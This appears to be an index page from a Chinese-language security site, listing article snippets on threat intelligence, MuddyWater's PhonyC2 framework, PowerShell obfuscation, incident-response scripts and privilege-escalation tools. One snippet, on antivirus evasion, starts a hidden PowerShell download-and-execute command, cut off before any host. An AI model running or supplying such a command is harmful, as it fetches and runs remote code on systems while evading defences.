威胁情报周报(10.14~10.20)
一周威胁情报摘要金融威胁情报勒索软件攻击泄露了超过23万名康卡斯特客户的社会安全号码政府威胁情报美国政府试图追回朝鲜 Lazarus Group 窃取的超过267万美元加密货币能源...
admin
.NET 一款内网渗透中替代PowerShell的工具
01阅读须知此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所...
PhonyC2:揭示MuddyWater的新恶意命令和控制框架
1. 摘要Deep Instinct的威胁研究团队已经确定了一个新的C2(命令与控制)框架,C2框架是定制的,持续开发的,至少从2021年起就被MuddyWater集团使用,该框架...
去除您的烦恼——Windows激活脚本 (MAS)
一、历史的苦恼很多人包括我在内,一直饱受激活提示的苦恼,晚上也有很多所谓的破解激活软件,下载到本地以后,通过病毒扫描软件一查杀,提示都是病毒。1.随机搜索windows激活工具下载...
Bypass_AV - Powershell命令免杀.md
0x01 前言powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('...
维他命每日安全简讯(2023.08.18)
每日头条1、Cofense披露主要针对美国某能源公司的二维码钓鱼活动 Cofense在8月16日披露了一场利用二维码的大型钓鱼活动,主要针对美国的一家大型能源公司。该活动...
拖网渔船 - PowerShell 脚本可帮助事件响应者发现对手持久性机制
这是什么?拖网渔网是一个 PowerShell 脚本,旨在帮助事件响应者发现 Windows 主机上的潜在入侵指标 ,主要关注持久性机制,包括计划任务、服务、注册表修改、启动项、...
渗透测试工具整理|提权篇
域提权PowerView:是一个PowerShell工具,用于获取Windows域的网络态势感知。https://github.com/PowerShellMafia/Power...
3个恶意邮件活动,发现8种 PowerShell 混淆
活动 1 | 恶意 Excel 宏导致 Remcos RAT 感染以下脚本是恶意垃圾邮件活动的一部分,通过以金融为主题的电子邮件传播 Remcos 远程访问木马 (RAT)。可以在...
安全简讯(2024.08.30)
1. DICK'S 在遭受网络攻击后关闭电子邮件并锁定员工账户8月28日,美国体育用品零售巨头迪克体育用品公司(DICK'S)近日遭遇网络攻击,导致其机密信息泄露。这家拥有857家...